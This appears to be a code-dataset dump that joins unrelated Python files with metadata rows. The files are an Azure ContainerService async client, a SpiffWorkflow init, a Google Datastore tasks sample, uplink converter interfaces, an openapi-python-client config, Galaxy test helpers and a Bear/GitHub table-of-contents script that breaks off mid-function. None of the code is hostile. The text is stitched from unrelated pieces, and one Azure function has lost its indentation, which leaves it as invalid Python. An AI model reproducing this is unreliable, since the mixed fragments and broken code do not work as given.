            resource_name=resource_name,
            content_type=content_type,
            json=_json,
            template_url=self._reset_aad_profile_initial.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200, 202]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        # No response body is expected; only invoke the custom callback.
        if cls:
            return cls(pipeline_response, None, {})
    _reset_aad_profile_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/resetAADProfile'}  # type: ignore
    @distributed_trace_async
    async def begin_reset_aad_profile(
        self,
        resource_group_name: str,
        resource_name: str,
        parameters: "_models.ManagedClusterAADProfile",
        **kwargs: Any
    ) -> AsyncLROPoller[None]:
        """Reset AAD Profile of a managed cluster.
        Update the AAD Profile for a managed cluster.
        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param resource_name: The name of the managed cluster resource.
        :type resource_name: str
        :param parameters: Parameters supplied to the Reset AAD Profile operation for a Managed
         Cluster.
        :type parameters: ~azure.mgmt.containerservice.v2020_04_01.models.ManagedClusterAADProfile
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
         this operation to not poll, or pass in your own initialized polling object for a personal
         polling strategy.
        :paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
         Retry-After header is present.
        :return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
        :rtype: ~azure.core.polling.AsyncLROPoller[None]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        # Pop LRO-control options so only transport kwargs flow to the pipeline.
        content_type = kwargs.pop('content_type', "application/json")  # type: Optional[str]
        polling = kwargs.pop('polling', True)  # type: Union[bool, azure.core.polling.AsyncPollingMethod]
        cls = kwargs.pop('cls', None)  # type: ClsType[None]
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None)  # type: Optional[str]
        # Without a continuation token, issue the initial request now.
        if cont_token is None:
            raw_result = await self._reset_aad_profile_initial(
                resource_group_name=resource_group_name,
                resource_name=resource_name,
                parameters=parameters,
                content_type=content_type,
                cls=lambda x,y,z: x,
                **kwargs
            )
        # Drop error_map so it is not forwarded to the polling method below.
        kwargs.pop('error_map', None)
        # No response body on completion; only apply the custom callback.
        def get_long_running_output(pipeline_response):
            if cls:
                return cls(pipeline_response, None, {})
        # polling: True -> default ARM poller, False -> no polling, else custom.
        if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
        elif polling is False: polling_method = AsyncNoPolling()
        else: polling_method = polling
        # Resume a previously started operation from its saved state.
        if cont_token:
            return AsyncLROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_reset_aad_profile.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/resetAADProfile'}  # type: ignore
async def _rotate_cluster_certificates_initial(
self,
resource_group_name: str,
resource_name: str,
**kwargs: Any
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_rotate_cluster_certificates_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
template_url=self._rotate_cluster_certificates_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_rotate_cluster_certificates_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/rotateClusterCertificates'} # type: ignore
    @distributed_trace_async
    async def begin_rotate_cluster_certificates(
        self,
        resource_group_name: str,
        resource_name: str,
        **kwargs: Any
    ) -> AsyncLROPoller[None]:
        """Rotate certificates of a managed cluster.
        Rotate certificates of a managed cluster.
        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param resource_name: The name of the managed cluster resource.
        :type resource_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
         this operation to not poll, or pass in your own initialized polling object for a personal
         polling strategy.
        :paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
         Retry-After header is present.
        :return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
        :rtype: ~azure.core.polling.AsyncLROPoller[None]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        # Pop LRO-control options so only transport kwargs flow to the pipeline.
        polling = kwargs.pop('polling', True)  # type: Union[bool, azure.core.polling.AsyncPollingMethod]
        cls = kwargs.pop('cls', None)  # type: ClsType[None]
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None)  # type: Optional[str]
        # Without a continuation token, issue the initial request now.
        if cont_token is None:
            raw_result = await self._rotate_cluster_certificates_initial(
                resource_group_name=resource_group_name,
                resource_name=resource_name,
                cls=lambda x,y,z: x,
                **kwargs
            )
        # Drop error_map so it is not forwarded to the polling method below.
        kwargs.pop('error_map', None)
        # No response body on completion; only apply the custom callback.
        def get_long_running_output(pipeline_response):
            if cls:
                return cls(pipeline_response, None, {})
        # polling: True -> default ARM poller, False -> no polling, else custom.
        if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
        elif polling is False: polling_method = AsyncNoPolling()
        else: polling_method = polling
        # Resume a previously started operation from its saved state.
        if cont_token:
            return AsyncLROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_rotate_cluster_certificates.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/rotateClusterCertificates'}  # type: ignore
| 46.435702 | 598 | 0.682803 |
ace95a316f3a8e3f49e9d1945f46a839f9eff463 | 257 | py | Python | contrib/workflow/SpiffWorkflow/src/SpiffWorkflow/__init__.py | gonicus/clacks | da579f0acc4e48cf2e9451417ac6792282cf7ab6 | [
"ZPL-2.1"
] | 2 | 2015-01-26T07:15:19.000Z | 2015-11-09T13:42:11.000Z | contrib/workflow/SpiffWorkflow/src/SpiffWorkflow/__init__.py | gonicus/clacks | da579f0acc4e48cf2e9451417ac6792282cf7ab6 | [
"ZPL-2.1"
] | null | null | null | contrib/workflow/SpiffWorkflow/src/SpiffWorkflow/__init__.py | gonicus/clacks | da579f0acc4e48cf2e9451417ac6792282cf7ab6 | [
"ZPL-2.1"
] | null | null | null | from Job import Job
from Workflow import Workflow
from Exception import WorkflowException
from Task import Task
import inspect
# Public API: every module-level name that is neither private (leading "_")
# nor an imported module object.
__all__ = [name for name, obj in locals().items()
           if not (name.startswith('_') or inspect.ismodule(obj))]
| 28.555556 | 66 | 0.712062 |
ace95ae2deb4221e526864a85408335c70a141ff | 3,775 | py | Python | datastore/cloud-client/tasks.py | TestShared-demo/python-docs-samples | c03bb27e87f50c31cd8b9e509dca2d0e0eec37ab | [
"Apache-2.0"
] | 1 | 2022-01-13T08:49:45.000Z | 2022-01-13T08:49:45.000Z | datastore/cloud-client/tasks.py | TestShared-demo/python-docs-samples | c03bb27e87f50c31cd8b9e509dca2d0e0eec37ab | [
"Apache-2.0"
] | 2 | 2020-05-05T05:16:18.000Z | 2020-05-18T08:16:38.000Z | datastore/cloud-client/tasks.py | TestShared-demo/python-docs-samples | c03bb27e87f50c31cd8b9e509dca2d0e0eec37ab | [
"Apache-2.0"
] | 1 | 2022-03-03T02:56:20.000Z | 2022-03-03T02:56:20.000Z | # Copyright 2016, Google, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import datetime
# [START datastore_build_service]
from google.cloud import datastore
def create_client(project_id):
    """Build a Cloud Datastore client bound to *project_id*."""
    client = datastore.Client(project_id)
    return client
# [END datastore_build_service]
# [START datastore_add_entity]
def add_task(client, description):
    """Store a new, not-yet-done Task entity and return its key."""
    entity = datastore.Entity(
        client.key("Task"), exclude_from_indexes=["description"]
    )
    entity.update({
        "created": datetime.datetime.utcnow(),
        "description": description,
        "done": False,
    })
    client.put(entity)
    return entity.key
# [END datastore_add_entity]
# [START datastore_update_entity]
def mark_done(client, task_id):
    """Flag the task identified by *task_id* as completed, inside a transaction.

    Raises ValueError if no such task exists.
    """
    with client.transaction():
        entity = client.get(client.key("Task", task_id))
        if not entity:
            raise ValueError(f"Task {task_id} does not exist.")
        entity["done"] = True
        client.put(entity)
# [END datastore_update_entity]
# [START datastore_retrieve_entities]
def list_tasks(client):
    """Return every Task entity as a list, oldest first."""
    task_query = client.query(kind="Task")
    task_query.order = ["created"]
    return list(task_query.fetch())
# [END datastore_retrieve_entities]
# [START datastore_delete_entity]
def delete_task(client, task_id):
    """Remove the Task entity identified by *task_id*."""
    client.delete(client.key("Task", task_id))
# [END datastore_delete_entity]
def format_tasks(tasks):
    """Render tasks one per line as 'id: description (status)'."""
    def _status(task):
        # A finished task shows "done"; a pending one shows its creation time.
        return "done" if task["done"] else f"created {task['created']}"
    return "\n".join(
        f"{task.key.id}: {task['description']} ({_status(task)})"
        for task in tasks
    )
def new_command(client, args):
    """Adds a task with description <description>."""
    created_key = add_task(client, args.description)
    print(f"Task {created_key.id} added.")
def done_command(client, args):
    """Marks a task as done."""
    task_id = args.task_id
    mark_done(client, task_id)
    print(f"Task {task_id} marked done.")
def list_command(client, args):
    """Lists all tasks by creation time."""
    output = format_tasks(list_tasks(client))
    print(output)
def delete_command(client, args):
    """Deletes a task."""
    task_id = args.task_id
    delete_task(client, task_id)
    print(f"Task {task_id} deleted.")
# Command-line entry point: a thin argparse wrapper around the task helpers.
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    subparsers = parser.add_subparsers()
    parser.add_argument("--project-id", help="Your cloud project ID.")
    # Each sub-command reuses its handler's docstring as its help text and
    # binds the handler via set_defaults(func=...).
    new_parser = subparsers.add_parser("new", help=new_command.__doc__)
    new_parser.set_defaults(func=new_command)
    new_parser.add_argument("description", help="New task description.")
    done_parser = subparsers.add_parser("done", help=done_command.__doc__)
    done_parser.set_defaults(func=done_command)
    done_parser.add_argument("task_id", help="Task ID.", type=int)
    list_parser = subparsers.add_parser("list", help=list_command.__doc__)
    list_parser.set_defaults(func=list_command)
    delete_parser = subparsers.add_parser("delete", help=delete_command.__doc__)
    delete_parser.set_defaults(func=delete_command)
    delete_parser.add_argument("task_id", help="Task ID.", type=int)
    args = parser.parse_args()
    client = create_client(args.project_id)
    # Dispatch to whichever handler the chosen sub-command bound to args.func.
    args.func(client, args)
| 25.506757 | 80 | 0.690331 |
ace95b463cb915d88effb57d891ebcfcc00aa0bc | 4,636 | py | Python | uplink/converters/interfaces.py | lust4life/uplink | 44d7dcce1b40029e325c831c9e5683c41081c524 | [
"MIT"
] | 918 | 2017-10-20T10:47:40.000Z | 2022-03-27T19:10:21.000Z | uplink/converters/interfaces.py | lust4life/uplink | 44d7dcce1b40029e325c831c9e5683c41081c524 | [
"MIT"
] | 248 | 2017-10-20T03:58:20.000Z | 2022-03-13T18:39:16.000Z | uplink/converters/interfaces.py | lust4life/uplink | 44d7dcce1b40029e325c831c9e5683c41081c524 | [
"MIT"
] | 66 | 2017-10-21T02:56:34.000Z | 2022-02-15T08:27:50.000Z | class Converter(object):
    def convert(self, value):
        """Convert ``value``; concrete converters must override this."""
        raise NotImplementedError

    def __call__(self, *args, **kwargs):
        # Calling a converter instance is equivalent to calling convert().
        return self.convert(*args, **kwargs)

    def set_chain(self, chain):
        # Hook for converters that need access to the converter chain;
        # the default implementation deliberately does nothing.
        pass
class Factory(object):
    """
    An adapter that handles serialization of HTTP request properties
    (e.g., headers, query parameters, request body) and deserialization
    of HTTP response bodies.

    Each concrete implementation of this abstract class typically
    encapsulates a specific encoding/decoding strategy
    (e.g., Protocol Buffers or JSON).

    .. note::

        Overriding all inherited methods is unnecessary; the default
        implementation is to return :obj:`None`, which tells the
        converter layer to move on to the next factory. Hence,
        you only should implement the methods you intend to support.
    """

    def create_response_body_converter(self, cls, request_definition):
        """
        Returns a callable that can convert a response body into the
        specified :obj:`cls`.

        The returned callable should expect a single positional
        argument: the response body.

        If this factory can't produce such a callable, it should return
        :obj:`None`, so another factory can have a chance to handle
        the type.

        Args:
            cls (:obj:`type`): The target class for conversion.
            request_definition: Metadata for the outgoing request.
                This object exposes two properties: the
                :obj:`method_annotations` (e.g., `~uplink.headers`) and
                :obj:`argument_annotations` (e.g., `~uplink.Body`) bound
                to the underlying consumer method
        """
        # Default: return None so the converter layer tries the next factory.

    def create_request_body_converter(self, cls, request_definition):
        """
        Returns a callable that can convert :obj:`cls` into an acceptable
        request body.

        The returned callable should expect a single positional
        argument: an instance of given type, :obj:`cls`.

        If this factory can't produce such a callable, it should return
        :py:obj:`None`, so another factory can have a chance to handle
        the type.

        Args:
            cls (:obj:`type`): The target class for conversion.
            request_definition: Metadata for the outgoing request.
                This object exposes two properties: the
                :obj:`method_annotations` (e.g., `~uplink.headers`) and
                :obj:`argument_annotations` (e.g., `~uplink.Body`) bound
                to the underlying consumer method
        """
        # Default: return None so the converter layer tries the next factory.

    def create_string_converter(self, cls, request_definition):
        """
        Returns a callable that can convert `cls` into a
        :py:class:`str`.

        The returned callable should expect a single positional
        argument: an instance of given type, :obj:`cls`.

        If this factory can't produce such a callable, it should return
        :py:obj:`None`, so another factory can have a chance to handle
        the type.

        Args:
            cls (:obj:`type`): The target class for conversion.
            request_definition: Metadata for the outgoing request.
                This object exposes two properties: the
                :obj:`method_annotations` (e.g., `~uplink.headers`) and
                :obj:`argument_annotations` (e.g., `~uplink.Body`) bound
                to the underlying consumer method
        """
        # Default: return None so the converter layer tries the next factory.
class ConverterFactory(Factory):
    """Legacy adapter that forwards the ``create_*`` hooks to the older
    ``make_*`` hook names for backwards compatibility.
    """

    # TODO: Remove this in v1.0.0 -- use Factory instead.

    @staticmethod
    def _annotations(request_definition):
        # Unpack the two annotation collections the legacy hooks expect.
        return (
            request_definition.argument_annotations,
            request_definition.method_annotations,
        )

    def create_response_body_converter(self, cls, request_definition):
        arg_notes, method_notes = self._annotations(request_definition)
        return self.make_response_body_converter(cls, arg_notes, method_notes)

    def create_request_body_converter(self, cls, request_definition):
        arg_notes, method_notes = self._annotations(request_definition)
        return self.make_request_body_converter(cls, arg_notes, method_notes)

    def create_string_converter(self, cls, request_definition):
        arg_notes, method_notes = self._annotations(request_definition)
        return self.make_string_converter(cls, arg_notes, method_notes)

    def make_response_body_converter(
        self, type, argument_annotations, method_annotations
    ):
        # Default: defer to the next factory in the chain.
        return None

    def make_request_body_converter(
        self, type, argument_annotations, method_annotations
    ):
        # Default: defer to the next factory in the chain.
        return None

    def make_string_converter(
        self, type, argument_annotations, method_annotations
    ):
        # Default: defer to the next factory in the chain.
        return None
ace95c6b132e0b84fbc48ebefbd24d2562266758 | 1,436 | py | Python | openapi_python_client/config.py | oterrier/openapi-python-client | ca8acdbe34b11584143b78afc130684f0690d5bf | [
"MIT"
] | 172 | 2020-02-15T20:14:16.000Z | 2021-06-09T07:09:15.000Z | openapi_python_client/config.py | oterrier/openapi-python-client | ca8acdbe34b11584143b78afc130684f0690d5bf | [
"MIT"
] | 410 | 2020-02-15T19:39:29.000Z | 2021-06-09T19:28:57.000Z | openapi_python_client/config.py | oterrier/openapi-python-client | ca8acdbe34b11584143b78afc130684f0690d5bf | [
"MIT"
] | 38 | 2020-04-12T09:36:27.000Z | 2021-06-11T08:57:07.000Z | import json
import mimetypes
from pathlib import Path
from typing import Dict, List, Optional
import yaml
from pydantic import BaseModel
class ClassOverride(BaseModel):
    """An override of a single generated class.

    See https://github.com/openapi-generators/openapi-python-client#class_overrides
    """

    # Replacement class name for the generated model (None = keep generated).
    class_name: Optional[str] = None
    # Replacement module name for the generated model (None = keep generated).
    module_name: Optional[str] = None
class Config(BaseModel):
    """Contains any configurable values passed by the user.

    See https://github.com/openapi-generators/openapi-python-client#configuration
    """

    # Per-class overrides keyed by the generated class name.
    class_overrides: Dict[str, ClassOverride] = {}
    project_name_override: Optional[str]
    package_name_override: Optional[str]
    package_version_override: Optional[str]
    # Shell commands run over the generated project after generation.
    post_hooks: List[str] = [
        "autoflake -i -r --remove-all-unused-imports --remove-unused-variables --ignore-init-module-imports .",
        "isort .",
        "black .",
    ]
    # Prefix applied to fields whose names collide with Python keywords etc.
    field_prefix: str = "field_"

    @staticmethod
    def load_from_path(path: Path) -> "Config":
        """Creates a Config from provided JSON or YAML file and sets a bunch of globals from it"""
        # MIME type decides the parser; anything that is not detected as JSON
        # falls through to YAML (yaml.safe_load also accepts JSON documents).
        mime = mimetypes.guess_type(path.absolute().as_uri(), strict=True)[0]
        if mime == "application/json":
            config_data = json.loads(path.read_text())
        else:
            config_data = yaml.safe_load(path.read_text())
        config = Config(**config_data)
        return config
| 30.553191 | 111 | 0.679666 |
ace95c9b9d430d0b0aac8745ae41e10938edc73d | 1,275 | py | Python | lib/galaxy_test/base/api_util.py | rhpvorderman/galaxy | 178015f8eff0b0c7a59c0d6756658f6428222837 | [
"CC-BY-3.0"
] | 1,085 | 2015-02-18T16:14:38.000Z | 2022-03-30T23:52:07.000Z | lib/galaxy_test/base/api_util.py | rhpvorderman/galaxy | 178015f8eff0b0c7a59c0d6756658f6428222837 | [
"CC-BY-3.0"
] | 11,253 | 2015-02-18T17:47:32.000Z | 2022-03-31T21:47:03.000Z | lib/galaxy_test/base/api_util.py | rhpvorderman/galaxy | 178015f8eff0b0c7a59c0d6756658f6428222837 | [
"CC-BY-3.0"
] | 1,000 | 2015-02-18T16:18:10.000Z | 2022-03-29T08:22:56.000Z | import os
from typing import Optional
DEFAULT_GALAXY_MASTER_API_KEY = "TEST123"
DEFAULT_GALAXY_USER_API_KEY = None
DEFAULT_TEST_USER = "user@bx.psu.edu"
DEFAULT_ADMIN_TEST_USER = "test@bx.psu.edu"
DEFAULT_OTHER_USER = "otheruser@bx.psu.edu" # A second user for API testing.
TEST_USER = os.environ.get("GALAXY_TEST_USER_EMAIL", DEFAULT_TEST_USER)
ADMIN_TEST_USER = os.environ.get("GALAXY_TEST_ADMIN_USER_EMAIL", DEFAULT_ADMIN_TEST_USER)
OTHER_USER = os.environ.get("GALAXY_TEST_OTHER_USER_EMAIL", DEFAULT_OTHER_USER)
def get_admin_api_key() -> str:
    """Return the admin API key to use for functional tests.

    The first non-empty value among the recognized environment variables
    wins; otherwise the built-in default is returned. The configured key
    should be an admin API key able to create additional users and keys.
    """
    env_names = ("GALAXY_CONFIG_MASTER_API_KEY", "GALAXY_CONFIG_OVERRIDE_MASTER_API_KEY")
    for env_name in env_names:
        candidate = os.environ.get(env_name)
        if candidate:
            return candidate
    return DEFAULT_GALAXY_MASTER_API_KEY
def get_user_api_key() -> Optional[str]:
    """Return the test user API key for functional tests, if configured.

    If set, this should drive API based testing - if not set an admin API key
    will be used to create a new user and API key for tests.
    """
    configured = os.environ.get("GALAXY_TEST_USER_API_KEY")
    return configured if configured is not None else DEFAULT_GALAXY_USER_API_KEY
ace95cc30a088384105d49286ed0b25b0f1d25d5 | 14,283 | py | Python | markdowntoc/markdowntoc.py | aflaisler/markdown-github-bear-toc | 5f4625f2cddbf9bece076b5a99a08c5b0b178c4b | [
"MIT"
] | null | null | null | markdowntoc/markdowntoc.py | aflaisler/markdown-github-bear-toc | 5f4625f2cddbf9bece076b5a99a08c5b0b178c4b | [
"MIT"
] | null | null | null | markdowntoc/markdowntoc.py | aflaisler/markdown-github-bear-toc | 5f4625f2cddbf9bece076b5a99a08c5b0b178c4b | [
"MIT"
] | null | null | null | # encoding=utf-8
# python3.6
import sqlite3
import os
from os import path
import re
import argparse
from urllib.parse import quote
import datetime as dt
from dateutil.relativedelta import relativedelta
# Location of Bear's sqlite database inside the user's home directory
# (macOS group-container path used by Bear).
HOME = os.getenv('HOME', '')
bear_db = path.join(HOME, 'Library/Group Containers/9K33E3U3T4.net.shinyfrog.bear/Application Data/database.sqlite')

# add_help=False frees up '-h' so it can be reused for --header-priority;
# an explicit '--help' flag is registered instead.
parser = argparse.ArgumentParser(description='Markdown Table of Contents Generator for Bear or Github', add_help=False)
parser.add_argument('--help', action='help',
                    help='Show this help message and exit')
parser.add_argument('name', nargs='+', type=str,
                    help='Bear Note UUID, Bear Note Title, Bear Note Tag, or Markdown file')
parser.add_argument('-h', '--header-priority', type=int, dest='header_priority', default=3,
                    help='(Default: 3) Maximum Header Priority/Strength to consider as Table of Contents')
parser.add_argument('-t', '--type', type=str.lower, dest='type', choices=['gitlab', 'github', 'bear'], default='github',
                    help='(Default: github) Github Anchors or Bear Anchors')
parser.add_argument('--no-write', dest='write', action='store_false',
                    help='Whether or not write Table of Contents to file or note automatically or output to the console.\
                    Add this flag to TURN OFF the automatic writing.')
parser.add_argument('-toc', '--table-of-contents-style', dest='toc', default='# Table of Contents',
                    help='(Default: \'# Table of Contents\') Table of Contents Style')
parser.set_defaults(write=True)
# Module-level args/params are consulted by most functions below.
args = parser.parse_args()
params = vars(args)
# Only open the Bear database when operating on Bear notes; conn/cursor are
# module-level globals used by get_notes_from_bear() and main().
if (params['type'] == 'bear'):
    conn = sqlite3.connect(bear_db)
    conn.row_factory = sqlite3.Row
    cursor = conn.cursor()
def get_notes_from_bear():
    """
    Returns all Bear Notes specified which have specified title or UUID.

    Uses the module-level ``cursor`` (open only when --type bear) and the
    module-level ``params['name']`` queries; a note matches when any query
    equals its title, its UUID, or one of its tags.
    """
    # Get all Unarchived notes from Bear
    read_query = "SELECT * FROM `ZSFNOTE` WHERE `ZTRASHED` LIKE '0' AND `ZARCHIVED` LIKE '0'"
    notes = cursor.execute(read_query)

    def match_title_uuid_tag(note):
        # Tags are derived from the note body text, not a separate table.
        note_tags = get_tags_in_note(note['ZTEXT'])
        for query in params['name']:
            if query in note_tags or query == note['ZTITLE'] or query == note['ZUNIQUEIDENTIFIER']:
                return True
        return False

    return list(filter(lambda note: match_title_uuid_tag(note), notes))
def get_tags_in_note(md_text):
    """Return the set of tags ('#tag' or '#multi word tag#') found in a note.

    Fenced code blocks are stripped first because the tag regex cannot
    distinguish tags from code. The fence handling quirk of the original is
    preserved: the opening ``` line is dropped while the closing ``` line is
    kept, because the flag toggles before the keep-check runs.
    """
    kept_lines = []
    inside_fence = False
    for raw_line in md_text.splitlines():
        if raw_line.startswith('```'):
            inside_fence = not inside_fence
        if not inside_fence:
            kept_lines.append(raw_line)
    searchable = '\n'.join(kept_lines)
    # A tag must follow start-of-line, a newline/carriage return, or a space.
    # Two forms (tried in this order):
    #   '#tag#'  -- may contain spaces, terminated by a closing '#'
    #   '#tag'   -- no spaces allowed, terminated by whitespace or end
    pattern = r'((?<=^)|(?<=\n|\r| ))(#[^#\r\n]+#|#[^#\r\n ]+)'
    # findall yields (lookbehind-group, tag) tuples; keep the second group.
    return {match[1] for match in re.findall(pattern, searchable, re.MULTILINE)}
def has_table_of_contents(md_text):
    """Return True when the Markdown text already contains a
    'Table of Contents' header (any header strength, case-insensitive).
    """
    toc_header = re.compile(r'^#+\sTable\sof\sContents', re.IGNORECASE | re.MULTILINE)
    return bool(toc_header.search(md_text))
def get_headers(md_text, max_priority):
    """Collect (header title, priority) pairs from Markdown text.

    The first line is skipped (it is assumed to be the note title), fenced
    code blocks are ignored, headers deeper than ``max_priority`` (more '#'
    characters) are dropped, as is any existing 'Table of Contents' header.
    Priorities are made sequential before being returned.

    Robustness fix: the original called ``next()`` on the line iterator to
    skip the title, which raised StopIteration on empty input; slicing the
    line list avoids that and simply yields no headers.
    """
    lines = md_text.splitlines()
    # List of Tuples: (Header Title, Number of #)
    header_priority_pairs = []
    in_code_block = False
    # Skip the first line because it's the Title.
    for line in lines[1:]:
        if line.startswith('```'):
            in_code_block = not in_code_block
        elif not in_code_block and line.startswith('#') and ' ' in line:
            md_header, header_title = line.split(' ', 1)
            # The marker must be all '#' characters (e.g. '##', not '#!').
            if md_header != md_header[0] * len(md_header):
                continue
            # Skip headers weaker (deeper) than the configured maximum.
            if len(md_header) > max_priority:
                continue
            # Skip an existing ToC header and trivially short titles.
            if header_title.lower() != 'table of contents' and len(header_title) > 1:
                header_priority_pairs.append((header_title, len(md_header)))
    return sequentialize_header_priorities(header_priority_pairs)
def sequentialize_header_priorities(header_priority_pairs):
    """Clamp header priorities so each is at most one deeper than the previous.

    The Table of Contents generator indents entries by priority, so a jump
    such as H1 -> H3 would create an orphaned indentation level. Pairs are
    adjusted in place and the same list is returned, e.g.::

        [('A', 1), ('B', 3), ('C', 4)] -> [('A', 1), ('B', 2), ('C', 3)]
    """
    for index in range(len(header_priority_pairs) - 1):
        _, current_priority = header_priority_pairs[index]
        next_title, next_priority = header_priority_pairs[index + 1]
        if next_priority - current_priority > 1:
            # Pull the next header up to exactly one level deeper.
            header_priority_pairs[index + 1] = (next_title, current_priority + 1)
    return header_priority_pairs
def create_bear_header_anchor(header_title, note_uuid):
    """Return a Markdown link that opens the given header of a Bear note
    via Bear's x-callback-url scheme.
    """
    encoded_title = quote(header_title)
    callback = 'bear://x-callback-url/open-note?id={}&header={}'.format(note_uuid, encoded_title)
    return '[{}]({})'.format(header_title, callback)
def create_github_header_anchor(header_title):
    """Return a Markdown link to the header using GitHub's anchor rules.

    GitHub heading slugs are lowercased, punctuation is removed, and spaces
    become hyphens. The previous implementation only replaced spaces, which
    produced broken anchors for headers containing uppercase letters or
    punctuation.
    """
    slug = re.sub(r'[^\w\- ]', '', header_title.strip().lower()).replace(' ', '-')
    return '[{}](#{})'.format(header_title, slug)
def create_gitlab_header_anchor(header_title):
    """Return a Markdown link to the header using GitLab's anchor rules.

    GitLab heading slugs are lowercased with punctuation removed and spaces
    turned into hyphens. The previous implementation kept punctuation, which
    produced broken anchors for headers such as 'FAQ: Setup'.
    """
    slug = re.sub(r'[^\w\- ]', '', header_title.lower().strip()).replace(' ', '-')
    return '[{}](#{})'.format(header_title, slug)
def create_table_of_contents(header_priority_pairs, note_uuid=None):
    """
    Returns a list of strings containing the Table of Contents.

    Returns None when there are no headers. The heading style and anchor
    flavor come from the module-level ``params`` (argparse results);
    ``note_uuid`` is only needed for Bear x-callback anchors.
    """
    if len(header_priority_pairs) == 0:
        return None
    bullet_list = [params['toc']]
    # Indentation is relative to the strongest (lowest-numbered) header seen.
    highest_priority = min(header_priority_pairs, key=lambda pair: pair[1])[1]
    for header, priority in header_priority_pairs:
        md_anchor = create_bear_header_anchor(header, note_uuid) if params['type'] == 'bear' \
            else create_github_header_anchor(header) if params['type'] == 'github' \
            else create_gitlab_header_anchor(header)
        bullet_list.append('\t' * (priority - highest_priority) + '* ' + md_anchor)
    # Specifically for Bear add separator
    if params['type'] == 'bear':
        bullet_list.append('---')
    return bullet_list
def create_table_of_contents_bear():
    """
    Read Bear Notes and returns list of (Original Text, Table of Contents List) and list of note UUIDs.

    Notes that already contain a ToC, or that have no eligible headers,
    are skipped with a warning.
    """
    notes = get_notes_from_bear()
    md_text_toc_pairs = []
    uuids = []
    for row in notes:
        title = row['ZTITLE']
        md_text = row['ZTEXT'].rstrip()
        uuid = row['ZUNIQUEIDENTIFIER']
        # creation_date = row['ZCREATIONDATE']
        # modified = row['ZMODIFICATIONDATE']
        if has_table_of_contents(md_text):
            print('[WARNING]: \'{}\' already has a Table of Contents, Ignoring...'.format(title))
            continue
        header_list = get_headers(md_text, params['header_priority'])
        table_of_contents_lines = create_table_of_contents(header_list, uuid)
        if table_of_contents_lines is None:
            print('[WARNING]: \'{}\' has no headers to create a Table of Contents, Ignoring...'.format(title))
            continue
        if (params['write']):
            print('Creating a Table of Contents for \'{}\''.format(title))
        md_text_toc_pairs.append((md_text, table_of_contents_lines))
        uuids.append(uuid)
    return md_text_toc_pairs, uuids
def create_table_of_contents_github_or_gitlab():
    """
    Read from file and returns list of (Original Text, Table of Contents List).

    Only '.md' files from ``params['name']`` are considered; unreadable
    files, files that already contain a ToC, and files without eligible
    headers are skipped with a warning. Also returns the list of file
    paths that were accepted, parallel to the pairs list.
    """
    md_text_toc_pairs = []
    valid_filepaths = []
    for filepath in params['name']:
        name, ext = path.splitext(filepath)
        if ext.lower() != '.md':
            print('[WARNING]: {} is not a Markdown File, Ignoring...'.format(filepath))
            continue
        try:
            with open(filepath, 'r') as file:
                md_text = file.read()
                if has_table_of_contents(md_text):
                    print('[WARNING]: {} already has a Table of Contents, Ignoring...'.format(filepath))
                    continue
